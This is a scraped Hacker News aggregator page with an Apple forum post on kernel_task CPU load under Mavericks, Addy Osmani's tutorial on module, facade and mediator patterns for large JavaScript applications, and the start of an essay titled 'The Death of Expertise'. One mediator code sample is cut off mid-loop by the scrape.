Quantcast
Channel: Hacker News 50
Viewing all 9433 articles
Browse latest View live

kernel_task is using 100% CPU when...: Apple Support Communities

$
0
0

Comments:"kernel_task is using 100% CPU when...: Apple Support Communities"

URL:https://discussions.apple.com/thread/5497235?start=0&tstart=0


I'm in the same boat. No issues before installing Mavericks.

 

I did the same tests, even disabled the 3rd party kext I had (pace driver, related to some vst plugins I have) with no luck.

 

I ran sysdiagnostics and can see the following interrupts, taken from powermetrics.txt:

 

****  Interrupt distribution ****

 

 

CPU 0:

          Vector 0x49(MacBookAir6,2): 31.67 interrupts/sec

          Vector 0x92(IGPU): 408.07 interrupts/sec

          Vector 0x96(HDEF): 216491.54 interrupts/sec

          Vector 0x98(ARPT): 11.06 interrupts/sec

          Vector 0x9e(SSD0): 25.10 interrupts/sec

          Vector 0xdd(TMR): 367.54 interrupts/sec

          Vector 0xde(IPI): 161.86 interrupts/sec

CPU 1:

          Vector 0xdd(TMR): 32.17 interrupts/sec

          Vector 0xde(IPI): 56.18 interrupts/sec

CPU 2:

          Vector 0xdd(TMR): 934.68 interrupts/sec

          Vector 0xde(IPI): 1103.50 interrupts/sec

CPU 3:

          Vector 0xdd(TMR): 165.04 interrupts/sec

          Vector 0xde(IPI): 242.83 interrupts/sec

 

 

I feel like that is not normal(see bold) Anyone know what HDEF is referring to, might help tracking this down.


The Whistle-Blower Who Freed Dreyfus

Patterns For Large-Scale JavaScript Application Architecture

$
0
0

Comments:"Patterns For Large-Scale JavaScript Application Architecture"

URL:http://addyosmani.com/largescalejavascript/


Tweet

 

Today we're going to discuss an effective set of patterns for large-scale JavaScript application architecture. The material is based on my talk of the same name, last presented at LondonJS and inspired by previous work by Nicholas Zakas.

 

Who am I and why am I writing about this topic?

I'm currently a JavaScript and UI developer at AOL helping to plan and write the front-end architecture to our next generation of client-facing applications. As these applications are both complex and often require an architecture that is scalable and highly-reusable, it's one of my responsibilities to ensure the patterns used to implement such applications are as sustainable as possible.

I also consider myself something of a design pattern enthusiast (although there are far more knowledgeable experts on this topic than I). I've previously written the creative-commons book 'Essential JavaScript Design Patterns' and am in the middle of writing the more detailed follow up to this book at the moment.

 

Can you summarize this article in 140 characters?

In the event of you being short for time, here's the tweet-sized summary of this article:

Decouple app. architecture w/module,facade & mediator patterns. Mods publish msgs, mediator acts as pub/sub mgr & facade handles security

 

What exactly is a 'large' JavaScript application?

Before we begin, let us attempt to define what we mean when we refer to a JavaScript application as being significantly 'large'. This is a question I've found still challenges developers with many years of experience in the field and the answer to this can be quite subjective.

As an experiment, I asked a few intermediate developers to try providing their definition of it informally. One developer suggested 'a JavaScript application with over 100,000 LOC' whilst another suggested 'apps with over 1MB of JavaScript code written in-house'. Whilst valiant (if not scary) suggestions, both of these are incorrect as the size of a codebase does not always correlate to application complexity - those 100,000 LOC could easily represent quite trivial code.

My own definition may or may not be universally accepted, but I believe that it's closer to what a large application actually represents.

In my view, large-scale JavaScript apps are non-trivial applications requiring significant developer effort to maintain, where most heavy lifting of data manipulation and display falls to the browser.

The last part of this definition is possibly the most significant.

Let's review your current architecture.

If working on a significantly large JavaScript application, remember to dedicate sufficient time to planning the underlying architecture that makes the most sense. It's often more complex than you may initially imagine.

I can't stress the importance of this enough - some developers I've seen approach larger applications have stepped back and said 'Okay. Well, there are a set of ideas and patterns that worked well for me on my last medium-scale project. Surely they should mostly apply to something a little larger, right?'. Whilst this may be true to an extent, please don't take it for granted - larger apps generally have greater concerns that need to be factored in. I'm going to discuss shortly why spending a little more time planning out the structure to your application is worth it in the long run.

Most JavaScript developers likely use a mixed combination of the following for their current architecture:

  • custom widgets
  • models
  • views
  • controllers
  • templates
  • libraries/toolkits
  • an application core.

You probably also break down your application's functionality into blocks of modules or apply other patterns for this. This is great, but there are a number of potential problems you can run into if this represents all of your application's structure.

1. How much of this architecture is instantly re-usable?

Can single modules exist on their own independently? Are they self-contained? Right now if I were to look at the codebase for a large application you or your team were working on and selected a random module, would it be possible for me to easily just drop it into a new page and start using it on its own?. You may question the rationale behind wanting to do this, however I encourage you to think about the future. What if your company were to begin building more and more non-trivial applications which shared some cross-over in functionality?. If someone said, 'Our users love using the chat module in our mail client. Let's drop that into our new collaborative editing suite', would this be possible without significantly altering the code?.

2. How much do modules depend on other modules in the system?

Are they tightly coupled? Before I dig into why this is a concern, I should note that I understand it's not always possible to have modules with absolutely no other dependencies in a system. At a granular level you may well have modules that extend the base functionality of others, but this question is more-so related to groups of modules with distinct functionality. It should be possible for all of these distinct sets of modules to work in your application without depending on too many other modules being present or loaded in order to function.

3. If specific parts of your application fail, can it still function?

If you're building a GMail-like application and your webmail module (or modules) fail, this shouldn't block the rest of the UI or prevent users from being able to use other parts of the page such as chat. At the same time, as per before, modules should ideally be able to exist on their own outside of your current application architecture. In my talks I mention dynamic dependency (or module) loading based on expressed user-intent as something related. For example, in GMail's case they might have the chat module collapsed by default without the core module code loaded on page initialization. If a user expressed an intent to use the chat feature, only then would it be dynamically loaded. Ideally, you want this to be possible without it negatively affecting the rest of your application.

4. How easily can you test individual modules?

When working on systems of significant scale where there's a potential for millions of users to use (or mis-use) the different parts it, it's essential that modules which may end up being re-used across a number of different applications be sufficiently tested. Testing needs to be possible for when the module both inside and outside of the architecture for which it was initially built. In my view, this provides the most assurance that it shouldn't break if dropped into another system.

Think Long Term

When devising the architecture for your large application, it's important to think ahead. Not just a month or a year from now, but beyond that. What might change? It's of course impossible to guess exactly how your application may grow, but there's certainly room to consider what is likely. Here, there is at least one specific aspect of your application that comes to mind.

Developers often couple their DOM manipulation code quite tightly with the rest of their application - even when they've gone to the trouble of separating their core logic down into modules. Think about it..why is this not a good idea if we're thinking long-term?

One member of my audience suggested that it was because a rigid architecture defined in the present may not be suitable for the future. Whilst certainly true, there's another concern that may cost even more if not factored in.

You may well decide to switch from using Dojo, jQuery, Zepto or YUI to something entirely different for reasons of performance, security or design in the future. This can become a problem because libraries are not easily interchangeable and have high switching costs if tightly coupled to your app.

If you're a Dojo developer (like some of the audience at my talk), you may not have something better to switch to in the present, but who is to say that in 2-3 years something better doesn't come out that you'll want to switch to?.

This is a relatively trivial decision in smaller codebases but for larger applications, having an architecture which is flexible enough to support not caring about the libraries being used in your modules can be of great benefit, both financially and from a time-saving perspective.

To summarize, if you reviewed your architecture right now, could a decision to switch libraries be made without rewriting your entire application?. If not, consider reading on because I think the architecture being outlined today may be of interest.

There are a number of influential JavaScript developers who have previously outlined some of the concerns I've touched upon so far. Three key quotes I would like to share from them are the following:

"The secret to building large apps is never build large apps. Break your applications into small pieces. Then, assemble those testable, bite-sized pieces into your big application" - Justin Meyer, author JavaScriptMVC

"The key is to acknowledge from the start that you have no idea how this will grow. When you accept that you don't know everything, you begin to design the system defensively. You identify the key areas that may change, which often is very easy when you put a little bit of time into it. For instance, you should expect that any part of the app that communicates with another system will likely change, so you need to abstract that away." - Nicholas Zakas, author 'High-performance JavaScript websites'

and last but not least:

"The more tied components are to each other, the less reusable they will be, and the more difficult it becomes to make changes to one without accidentally affecting another" - Rebecca Murphey, author of jQuery Fundamentals.

These principles are essential to building an architecture that can stand the test of time and should always be kept in mind.

Brainstorming

Let's think about what we're trying to achieve for a moment.

We want a loosely coupled architecture with functionality broken down into independent modules with ideally no inter-module dependencies. Modules speak to the rest of the application when something interesting happens and an intermediate layer interprets and reacts to these messages.

For example, if we had a JavaScript application responsible for an online bakery, one such 'interesting' message from a module might be 'batch 42 of bread rolls is ready for dispatch'.

We use a different layer to interpret messages from modules so that a) modules don't directly access the core and b) modules don't need to directly call or interact with other modules. This helps prevent applications from falling over due to errors with specific modules and provides us a way to kick-start modules which have fallen over.

Another concern is security. The reality is that most of us don't consider internal application security as that much of a concern. We tell ourselves that as we're structuring the application, we're intelligent enough to figure out what should be publicly or privately accessible.

However, wouldn't it help if you had a way to determine what a module was permitted to do in the system? eg. if I know I've limited the permissions in my system to not allow a public chat widget to interface with an admin module or a module with DB-write permissions, I can limit the chances of someone exploiting vulnerabilities I have yet to find in the widget to pass some XSS in there. Modules shouldn’t be able to access everything. They probably can in most current architectures, but do they really need to be able to?

Having an intermediate layer handle permissions for which modules can access which parts of your framework gives you added security. This means a module is only able to do at most what we’ve permitted it do.

The Proposed Architecture

 

The solution to the architecture we seek to define is a combination of three well-known design patterns: the module, facade and mediator.

Rather than the traditional model of modules directly communicating with each other, in this decoupled architecture, they'll instead only publish events of interest (ideally, without a knowledge of other modules in the system). The mediator pattern will be used to both subscribe to messages from these modules and handle what the appropriate response to notifications should be. The facade pattern will be used to enforce module permissions.

I will be going into more detail on each of these patterns below:

Module Theory

You probably already use some variation of modules in your existing architecture. If however, you don't, this section will present a short primer on them.

Modules are an integral piece of any robust application's architecture and are typically single-purpose parts of a larger system that are interchangeable.

Depending on how you implement modules, it's possible to define dependencies for them which can be automatically loaded to bring together all of the other parts instantly. This is considered more scalable than having to track the various dependencies for them and manually load modules or inject script tags.

Any significantly non-trivial application should be built from modular components. Going back to GMail, you could consider modules independent units of functionality that can exist on their own, so the chat feature for example. It's probably backed by a chat module, however, depending on how complex that unit of functionality is, it may well have more granular sub-modules that it depends on. For example, one could have a module simply to handle the use of emoticons which can be shared across both chat and mail composition parts of the system.

In the architecture being discussed, modules have a very limited knowledge of what's going on in the rest of the system. Instead, we delegate this responsibility to a mediator via a facade.

This is by design because if a module only cares about letting the system know when something of interest happens without worrying if other modules are running, a system is capable of supporting adding, removing or replacing modules without the rest of the modules in the system falling over due to tight coupling.

Loose coupling is thus essential to this idea being possible. It facilitates easier maintainability of modules by removing code dependencies where possible. In our case, modules should not rely on other modules in order to function correctly. When loose coupling is implemented effectively, its straight-forward to see how changes to one part of a system may affect another.

In JavaScript, there are several options for implementing modules including the well-known module pattern and object literals. Experienced developers will already be familiar with these and if so, please skip ahead to the section on CommonJS modules.

The Module Pattern

The module pattern is a popular design that pattern that encapsulates 'privacy', state and organization using closures. It provides a way of wrapping a mix of public and private methods and variables, protecting pieces from leaking into the global scope and accidentally colliding with another developer's interface. With this pattern, only a public API is returned, keeping everything else within the closure private.

This provides a clean solution for shielding logic doing the heavy lifting whilst only exposing an interface you wish other parts of your application to use. The pattern is quite similar to an immediately-invoked functional expression (IIFE) except that an object is returned rather than a function.

It should be noted that there isn't really a true sense of 'privacy' inside JavaScript because unlike some traditional languages, it doesn't have access modifiers. Variables can't technically be declared as being public nor private and so we use function scope to simulate this concept. Within the module pattern, variables or methods declared are only available inside the module itself thanks to closure. Variables or methods defined within the returning object however are available to everyone.

Below you can see an example of a shopping basket implemented using the pattern. The module itself is completely self-contained in a global object called basketModule. The basket array in the module is kept private and so other parts of your application are unable to directly read it. It only exists with the module's closure and so the only methods able to access it are those with access to its scope (ie. addItem(), getItem() etc).

var basketModule = (function() {
 var basket = []; //private
 return { //exposed to public
 addItem: function(values) {
 basket.push(values);
 },
 getItemCount: function() {
 return basket.length;
 },
 getTotal: function(){
 var q = this.getItemCount(),p=0;
 while(q--){
 p+= basket[q].price; 
 }
 return p;
 }
 }
}());

Inside the module, you'll notice we return an object. This gets automatically assigned to basketModule so that you can interact with it as follows:

//basketModule is an object with properties which can also be methods
basketModule.addItem({item:'bread',price:0.5});
basketModule.addItem({item:'butter',price:0.3});
console.log(basketModule.getItemCount());
console.log(basketModule.getTotal());
//however, the following will not work:
console.log(basketModule.basket);// (undefined as not inside the returned object)
console.log(basket); //(only exists within the scope of the closure)

The methods above are effectively namespaced inside basketModule.

From a historical perspective, the module pattern was originally developed by a number of people including Richard Cornford in 2003. It was later popularized by Douglas Crockford in his lectures and re-introduced by Eric Miraglia on the YUI blog.

How about the module pattern in specific toolkits or frameworks?

Dojo

Dojo attempts to provide 'class'-like functionality through dojo.declare, which can be used for amongst other things, creating implementations of the module pattern. For example, if we wanted to declare basket as a module of the store namespace, this could be achieved as follows:

//traditional way
var store = window.store || {};
store.basket = store.basket || {};
//using dojo.setObject
dojo.setObject("store.basket.object", (function() {
 var basket = [];
 function privateMethod() {
 console.log(basket);
 }
 return {
 publicMethod: function(){
 privateMethod();
 }
 };
}()));

which can become quite powerful when used with dojo.provide and mixins.

YUI

The following example is heavily based on the original YUI module pattern implementation by Eric Miraglia, but is relatively self-explanatory.

YAHOO.store.basket = function () {
 //"private" variables:
 var myPrivateVar = "I can be accessed only within YAHOO.store.basket .";
 //"private" method:
 var myPrivateMethod = function () {
 YAHOO.log("I can be accessed only from within YAHOO.store.basket");
 }
 return {
 myPublicProperty: "I'm a public property.",
 myPublicMethod: function () {
 YAHOO.log("I'm a public method.");
 //Within basket, I can access "private" vars and methods:
 YAHOO.log(myPrivateVar);
 YAHOO.log(myPrivateMethod());
 //The native scope of myPublicMethod is store so we can
 //access public members using "this":
 YAHOO.log(this.myPublicProperty);
 }
 };
}();

jQuery

There are a number of ways in which jQuery code unspecific to plugins can be wrapped inside the module pattern. Ben Cherry previously suggested an implementation where a function wrapper is used around module definitions in the event of there being a number of commonalities between modules.

In the following example, a library function is defined which declares a new library and automatically binds up the init function to document.ready when new libraries (ie. modules) are created.

function library(module) {
 $(function() {
 if (module.init) {
 module.init();
 }
 });
 return module;
}
var myLibrary = library(function() {
 return {
 init: function() {
 /*implementation*/
 }
 };
}());
Object Literal Notation

In object literal notation, an object is described as a set of comma-separated name/value pairs enclosured in curly braces ({}). Names inside the object may be either strings or identifiers that are followed by a colon. There should be no comma used after the final name/value pair in the object as this may result in errors.

Object literals don't require instantiation using the new operator but shouldn't be used at the start of a statement as the opening { may be interpreted as the beginning of a block. Below you can see an example of a module defined using object literal syntax. New members may be added to the object using assignment as follows myModule.property = 'someValue';

Whilst the module pattern is useful for many things, if you find yourself not requiring specific properties or methods to be private, the object literal is a more than suitable alternative.

var myModule = {
    myProperty : 'someValue',
    //object literals can contain properties and methods.
    //here, another object is defined for configuration
    //purposes:
    myConfig:{
        useCaching:true,
        language: 'en'   
    },
    //a very basic method
    myMethod: function(){
        console.log('I can haz functionality?');
    },
    //output a value based on current configuration
    myMethod2: function(){
        console.log('Caching is:' + (this.myConfig.useCaching)?'enabled':'disabled');
    },
    //override the current configuration
    myMethod3: function(newConfig){
        if(typeof newConfig == 'object'){
           this.myConfig = newConfig;
           console.log(this.myConfig.language); 
        }
    }
};
myModule.myMethod(); //I can haz functionality
myModule.myMethod2(); //outputs enabled
myModule.myMethod3({language:'fr',useCaching:false}); //fr

CommonJS Modules

Over the last year or two, you may have heard about CommonJS - a volunteer working group which designs, prototypes and standardizes JavaScript APIs. To date they've ratified standards for modules and packages.The CommonJS AMD proposal specifies a simple API for declaring modules which can be used with both synchronous and asynchronous script tag loading in the browser. Their module pattern is relatively clean and I consider it a reliable stepping stone to the module system proposed for ES Harmony (the next release of the JavaScript language).

From a structure perspective, a CommonJS module is a reusable piece of JavaScript which exports specific objects made available to any dependent code. This module format is becoming quite ubiquitous as a standard module format for JS. There are plenty of great tutorials on implementing CommonJS modules, but at a high-level they basically contain two primary parts: an exports object that contains the objects a module wishes to make available to other modules and a require function that modules can use to import the exports of other modules.

/*
Example of achieving compatibility with AMD and standard CommonJS by putting boilerplate around the standard CommonJS module format:
*/
(function(define){
define(function(require,exports){
// module contents
 var dep1 = require("dep1");
 exports.someExportedFunction = function(){...};
 //...
});
})(typeof define=="function"?define:function(factory){factory(require,exports)});

There are a number of great JavaScript libraries for handling module loading in the CommonJS module format, but my personal preference is RequireJS. A complete tutorial on RequireJS is outside the scope of this tutorial, but I can recommend reading James Burke's ScriptJunkie post on it here. I know a number of people that also like Yabble.

Out of the box, RequireJS provides methods for easing how we create static modules with wrappers and it's extremely easy to craft modules with support for asynchronous loading. It can easily load modules and their dependencies this way and execute the body of the module once available.

There are some developers that however claim CommonJS modules aren't suitable enough for the browser. The reason cited is that they can't be loaded via a script tag without some level of server-side assistance. We can imagine having a library for encoding images as ASCII art which might export a encodeToASCII function. A module from this could resemble:

var encodeToASCII = require("encoder").encodeToASCII;
exports.encodeSomeSource = function(){
 //process then call encodeToASCII
}

This type of scenario wouldn't work with a script tag because the scope isn't wrapped, meaning our encodeToASCII method would be attached to the window, require wouldn't be as such defined and exports would need to be created for each module separately. A client-side library together with server-side assistance or a library loading the script with an XHR request using eval() could however handle this easily.

Using RequireJS, the module from earlier could be rewritten as follows:

define(function(require, exports, module) {
 var encodeToASCII = require("encoder").encodeToASCII;
 exports.encodeSomeSource = function(){
 //process then call encodeToASCII
 }
});

For developers who may not rely on just using static JavaScript for their projects, CommonJS modules are an excellent path to go down, but do spend some time reading up on it. I've really only covered the tip of the ice berg but both the CommonJS wiki and Sitepen have a number of resources if you wish to read further.

The Facade Pattern

Next, we're going to look at the facade pattern, a design pattern which plays a critical role in the architecture being defined today.

When you put up a facade, you're usually creating an outward appearance which conceals a different reality. The facade pattern provides a convenient higher-level interface to a larger body of code, hiding its true underlying complexity. Think of it as simplifying the API being presented to other developers.

Facades are a structural pattern which can often be seen in JavaScript libraries and frameworks where, although an implementation may support methods with a wide range of behaviors, only a 'facade' or limited abstract of these methods is presented to the client for use.

This allows us to interact with the facade rather than the subsystem behind the scenes.

The reason the facade is of interest is because of its ability to hide implementation-specific details about a body of functionality contained in individual modules. The implementation of a module can change without the clients really even knowing about it.

By maintaining a consistent facade (simplified API), the worry about whether a module extensively uses dojo, jQuery, YUI, zepto or something else becomes significantly less important. As long as the interaction layer doesn't change, you retain the ability to switch out libraries (eg. jQuery for Dojo) at a later point without affecting the rest of the system.

Below is a very basic example of a facade in action. As you can see, our module contains a number of methods which have been privately defined. A facade is then used to supply a much simpler API to accessing these methods:

var module = (function() {
    var _private = {
        i:5,
        get : function() {
            console.log('current value:' + this.i);
        },
        set : function( val ) {
            this.i = val;
        },
        run : function() {
            console.log('running');
        },
 jump: function(){
 console.log('jumping');
 }
    };
    return {
        facade : function( args ) {
            _private.set(args.val);
            _private.get();
            if ( args.run ) {
                _private.run();
            }
        }
    }
}());
module.facade({run: true, val:10});
//outputs current value: 10, running

and that's really it for the facade before we apply it to our architecture. Next, we'll be diving into the exciting mediator pattern. The core difference between the facade pattern and the mediator is that the facade (a structural pattern) only exposes existing functionality whilst the mediator (a behavioral pattern) can add functionality.

 

The Mediator Pattern

The mediator pattern is best introduced with a simple analogy - think of your typical airport traffic control. The tower handles what planes can take off and land because all communications are done from the planes to the control tower, rather than from plane-to-plane. A centralized controller is key to the success of this system and that's really what a mediator is.

Mediators are used when the communication between modules may be complex, but is still well defined. If it appears a system may have too many relationships between modules in your code, it may be time to have a central point of control, which is where the pattern fits in.

In real-world terms, a mediator encapsulates how disparate modules interact with each other by acting as an intermediary. The pattern also promotes loose coupling by preventing objects from referring to each other explicitly - in our system, this helps to solve our module inter-dependency issues.

What other advantages does it have to offer? Well, mediators allow for actions of each module to vary independently, so it’s extremely flexible. If you've previously used the Observer (Pub/Sub) pattern to implement an event broadcast system between the modules in your system, you'll find mediators relatively easy to understand.

Let's take a look at a high level view of how modules might interact with a mediator:

Consider modules as publishers and the mediator as both a publisher and subscriber. Module 1 broadcasts an event notifying the mediator something needs to done. The mediator captures this message and 'starts' the modules needed to complete this task Module 2 performs the task that Module 1 requires and broadcasts a completion event back to the mediator. In the mean time, Module 3 has also been started by the mediator and is logging results of any notifications passed back from the mediator.

Notice how at no point do any of the modules directly communicate with one another. If Module 3 in the chain were to simply fail or stop functioning, the mediator could hypothetically 'pause' the tasks on the other modules, stop and restart Module 3 and then continue working with little to no impact on the system. This level of decoupling is one of the main strengths the pattern has to offer.

To review, the advantages of the mediator are that:

It decouples modules by introducing an intermediary as a central point of control.It allows modules to broadcast or listen for messages without being concerned with the rest of the system. Messages can be handled by any number of modules at once.

It is typically significantly more easy to add or remove features to systems which are loosely coupled like this.

And its disadvantages:

By adding a mediator between modules, they must always communicate indirectly. This can cause a very minor performance drop - because of the nature of loose coupling, its difficult to establish how a system might react by only looking at the broadcasts. At the end of the day, tight coupling causes all kinds of headaches and this is one solution.

Example: This is a possible implementation of the mediator pattern based on previous work by @rpflorence

var mediator = (function(){
    var subscribe = function(channel, fn){
        if (!mediator.channels[channel]) mediator.channels[channel] = [];
        mediator.channels[channel].push({ context: this, callback: fn });
        return this;
    },
    publish = function(channel){
        if (!mediator.channels[channel]) return false;
        var args = Array.prototype.slice.call(arguments, 1);
        for (var i = 0, l = mediator.channels[channel].length; i 

Example: Here are two sample uses of the implementation from above. It's effectively managed publish/subscribe:

//Pub/sub on a centralized mediator
mediator.name = "tim";
mediator.subscribe('nameChange', function(arg){
        console.log(this.name);
        this.name = arg;
        console.log(this.name);
});
mediator.publish('nameChange', 'david'); //tim, david
//Pub/sub via third party mediator
var obj = { name: 'sam' };
mediator.installTo(obj);
obj.subscribe('nameChange', function(arg){
        console.log(this.name);
        this.name = arg;
        console.log(this.name);
});
obj.publish('nameChange', 'john'); //sam, john

 

Applying The Facade: Abstraction Of The Core

In the architecture suggested:

A facade serves as an abstraction of the application core which sits between the mediator and our modules - it should ideally be the only other part of the system modules are aware of.

The responsibilities of the abstraction include ensuring a consistent interface to these modules is available at all times. This closely resembles the role of the sandbox controller in the excellent architecture first suggested by Nicholas Zakas.

Components are going to communicate with the mediator through the facade so it needs to be dependable. When I say 'communicate', I should clarify that as the facade is an abstraction of the mediator which will be listening out for broadcasts from modules that will be relayed back to the mediator.

In addition to providing an interface to modules, the facade also acts as a security guard, determining which parts of the application a module may access. Components only call their own methods and shouldn't be able to interface with anything they don't have permission to. For example, a module may broadcast dataValidationCompletedWriteToDB. The idea of a security check here is to ensure that the module has permissions to request database-write access. What we ideally want to avoid are issues with modules accidentally trying to do something they shouldn't be.

To review in short, the mediator remains a type of pub/sub manager but is only passed interesting messages once they've cleared permission checks by the facade.

 

Applying the Mediator: The Application Core

The mediator plays the role of the application core. We've briefly touched on some of its responsibilities but lets clarify what they are in full.

The core's primary job is to manage the module lifecycle. When the core detects an interesting message it needs to decide how the application should react - this effectively means deciding whether a module or set of modules needs to be started or stopped.

Once a module has been started, it should ideally execute automatically. It's not the core's task to decide whether this should be when the DOM is ready and there's enough scope in the architecture for modules to make such decisions on their own.

You may be wondering in what circumstance a module might need to be 'stopped' - if the application detects that a particular module has failed or is experiencing significant errors, a decision can be made to prevent methods in that module from executing further so that it may be restarted. The goal here is to assist in reducing disruption to the user experience.

In addition, the core should enable adding or removing modules without breaking anything. A typical example of where this may be the case is functionality which may not be available on initial page load, but is dynamically loaded based on expressed user-intent eg. going back to our GMail example, Google could keep the chat widget collapsed by default and only dynamically load in the chat module(s) when a user expresses an interest in using that part of the application. From a performance optimization perspective, this may make sense.

Error management will also be handled by the application core. In addition to modules broadcasting messages of interest they will also broadcast any errors experienced which the core can then react to accordingly (eg. stopping modules, restarting them etc).It's important that as part of a decoupled architecture there to be enough scope for the introduction of new or better ways of handling or displaying errors to the end user without manually having to change each module. Using publish/subscribe through a mediator allows us to achieve this.

 

Tying It All Together

 

  • Modules contain specific pieces of functionality for your application. They publish notifications informing the application whenever something interesting happens - this is their primary concern. As I'll cover in the FAQs, modules can depend on DOM utility methods, but ideally shouldn't depend on any other modules in the system. They should not be concerned with:

    • what objects or modules are subscribing to the messages they publish
    • where these objects are based (whether this is on the client or server)
    • how many objects subscribe to notifications
  •  

  • The Facade abstracts the core to avoid modules touching it directly. It subscribes to interesting events (from modules) and says 'Great! What happened? Give me the details!'. It also handles module security by checking to ensure the module broadcasting an event has the necessary permissions to pass such events that can be accepted.
  •  

  • The Mediator (Application Core) acts as a 'Pub/Sub' manager using the mediator pattern. It's responsible for module management and starts/stops modules as needed. This is of particular use for dynamic dependency loading and ensuring modules which fail can be centrally restarted as needed.

The result of this architecture is that modules (in most cases) are theoretically no longer dependent on other modules. They can be easily tested and maintained on their own and because of the level of decoupling applied, modules can be picked up and dropped into a new page for use in another project without significant additional effort. They can also be dynamically added or removed without the application falling over.

 

Beyond Pub/Sub: Automatic Event Registration

As previously mentioned by Michael Mahemoff, when thinking about large-scale JavaScript, it can be of benefit to exploit some of the more dynamic features of the language. You can read more about some of the concerns highlighted on Michael's G+ page, but I would like to focus on one specifically - automatic event registration (AER).

AER solves the problem of wiring up subscribers to publishers by introducing a pattern which auto-wires based on naming conventions. For example, if a module publishes an event called messageUpdate, anything with a messageUpdate method would be automatically called.

The setup for this pattern involves registering all components which might subscribe to events, registering all events that may be subscribed to and finally for each subscription method in your component-set, binding the event to it. It's a very interesting approach which is related to the architecture presented in this post, but does come with some interesting challenges.

For example, when working dynamically, objects may be required to register themselves upon creation. Please feel free to check out Michael's post on AER as he discusses how to handle such issues in more depth.

 

Frequently Asked Questions

Q: Is it possible to avoid implementing a sandbox or facade altogether?

A: Although the architecture outlined uses a facade to implement security features, it's entirely possible to get by using a mediator and pub/sub to communicate events of interest throughout the application without it. This lighter version would offer a similar level of decoupling, but ensure you're comfortable with modules directly touching the application core (mediator) if opting for this variation.

Q: You've mentioned modules not having any dependencies. Does this include dependencies such as third party libraries (eg. jQuery?)

A: I'm specifically referring to dependencies on other modules here. What some developers opting for an architecture such as this opt for is actually abstracting utilities common to DOM libraries -eg. one could have a DOM utility class for query selectors which when used returns the result of querying the DOM using jQuery (or, if you switched it out at a later point, Dojo). This way, although modules still query the DOM, they aren't directly using hardcoded functions from any particular library or toolkit. There's quite a lot of variation in how this might be achieved, but the takeaway is that ideally core modules shouldn't depend on other modules if opting for this architecture.

You'll find that when this is the case it can sometimes be more easy to get a complete module from one project working in another with little extra effort. I should make it clear that I fully agree that it can sometimes be significantly more sensible for modules to extend or use other modules for part of their functionality, however bear in mind that this can in some cases increase the effort required to make such modules 'liftable' for other projects.

Q: I'd like to start using this architecture today. Is there any boilerplate code around I can work from?

A: I plan on releasing a free boilerplate pack for this post when time permits, but at the moment, your best bet is probably the 'Writing Modular JavaScript' premium tutorial by Andrew Burgees (for complete disclosure, this is a referral link as any credits received are re-invested into reviewing material before I recommend it to others). Andrew's pack includes a screencast and code and covers most of the main concepts outlined in this post but opts for calling the facade a 'sandbox', as per Zakas. There's some discussion regarding just how DOM library abstraction should be ideally implemented in such an architecture - similar to my answer for the second question, Andrew opts for some interesting patterns on generalizing query selectors so that at most, switching libraries is a change that can be made in a few short lines. I'm not saying this is the right or best way to go about this, but it's an approach I personally also use.

Q: If the modules need to directly communicate with the core, is this possible?

A: As Zakas has previously hinted, there's technically no reason why modules shouldn't be able to access the core but this is more of a best practice than anything. If you want to strictly stick to this architecture you'll need to follow the rules defined or opt for a looser architecture as per the answer to the first question.

 

Credits

Thanks to Nicholas Zakas for his original work in bringing together many of the concepts presented today; Andrée Hansson for his kind offer to do a technical review of the post (as well as his feedback that helped improve it); Rebecca Murphey, Justin Meyer, John Hann, Peter Michaux, Paul Irish and Alex Sexton, all of whom have written material related to the topics discussed in the past and are a constant source of inspiration for both myself and others.

 

 

The Death Of Expertise

$
0
0

Comments:" The Death Of Expertise "

URL:http://thefederalist.com/2014/01/17/the-death-of-expertise


I am (or at least think I am) an expert. Not on everything, but in a particular area of human knowledge, specifically social science and public policy. When I say something on those subjects, I expect that my opinion holds more weight than that of most other people.

I never thought those were particularly controversial statements. As it turns out, they’re plenty controversial. Today, any assertion of expertise produces an explosion of anger from certain quarters of the American public, who immediately complain that such claims are nothing more than fallacious “appeals to authority,” sure signs of dreadful “elitism,” and an obvious effort to use credentials to stifle the dialogue required by a “real” democracy.

But democracy, as I wrote in an essay about C.S. Lewis and the Snowden affair, denotes a system of government, not an actual state of equality. It means that we enjoy equal rights versus the government, and in relation to each other. Having equal rights does not mean having equal talents, equal abilities, or equal knowledge.  It assuredly does not mean that “everyone’s opinion about anything is as good as anyone else’s.” And yet, this is now enshrined as the credo of a fair number of people despite being obvious nonsense.

What’s going on here?

I fear we are witnessing the “death of expertise”: a Google-fueled, Wikipedia-based, blog-sodden collapse of any division between professionals and laymen, students and teachers, knowers and wonderers – in other words, between those of any achievement in an area and those with none at all. By this, I do not mean the death of actual expertise, the knowledge of specific things that sets some people apart from others in various areas. There will always be doctors, lawyers, engineers, and other specialists in various fields. Rather, what I fear has died is any acknowledgement of expertise as anything that should alter our thoughts or change the way we live.

What has died is any acknowledgement of expertise as anything that should alter our thoughts or change the way we live.

This is a very bad thing. Yes, it’s true that experts can make mistakes, as disasters from thalidomide to the Challenger explosion tragically remind us. But mostly, experts have a pretty good batting average compared to laymen: doctors, whatever their errors, seem to do better with most illnesses than faith healers or your Aunt Ginny and her special chicken gut poultice. To reject the notion of expertise, and to replace it with a sanctimonious insistence that every person has a right to his or her own opinion, is silly.

Worse, it’s dangerous. The death of expertise is a rejection not only of knowledge, but of the ways in which we gain knowledge and learn about things. Fundamentally, it’s a rejection of science and rationality, which are the foundations of Western civilization itself. Yes, I said “Western civilization”: that paternalistic, racist, ethnocentric approach to knowledge that created the nuclear bomb, the Edsel, and New Coke, but which also keeps diabetics alive, lands mammoth airliners in the dark, and writes documents like the Charter of the United Nations.

This isn’t just about politics, which would be bad enough. No, it’s worse than that: the perverse effect of the death of expertise is that without real experts, everyone is an expert on everything. To take but one horrifying example, we live today in an advanced post-industrial country that is now fighting a resurgence of whooping cough — a scourge nearly eliminated a century ago — merely because otherwise intelligent people have been second-guessing their doctors and refusing to vaccinate their kids after reading stuff written by people who know exactly zip about medicine. (Yes, I mean people like Jenny McCarthy.

In politics, too, the problem has reached ridiculous proportions. People in political debates no longer distinguish the phrase “you’re wrong” from the phrase “you’re stupid.” To disagree is to insult. To correct another is to be a hater. And to refuse to acknowledge alternative views, no matter how fantastic or inane, is to be closed-minded.

How conversation became exhausting

Critics might dismiss all this by saying that everyone has a right to participate in the public sphere. That’s true. But every discussion must take place within limits and above a certain baseline of competence. And competence is sorely lacking in the public arena. People with strong views on going to war in other countries can barely find their own nation on a map; people who want to punish Congress for this or that law can’t name their own member of the House.

People with strong views on going to war in other countries can barely find their own nation on a map.
